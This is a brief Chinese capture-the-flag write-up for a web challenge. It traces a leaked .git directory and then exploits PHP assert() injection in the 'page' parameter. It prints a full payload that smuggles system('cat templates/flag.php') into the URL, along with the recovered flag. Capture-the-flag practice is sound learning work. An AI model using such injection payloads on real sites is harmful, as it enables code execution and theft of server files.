打开题目所给链接:
首先查看源码,会发现这个
但访问之后没什么用。我们点开About
会发现它似乎存在git源码泄露,访问/.git/
抓包后发现flag.php
但对解题没什么作用,我们查看index.php看是否能找到猫腻
我们利用assert命令执行来查看flag的内容 payload:?page=1’,‘2’) === false and system(‘cat templates/flag.php’) and strpos('templates/flag ,查看源码即可得到flag
cyberpeace{cdc942501e0ef5f30fa7e8169e826dbb}
相关文章: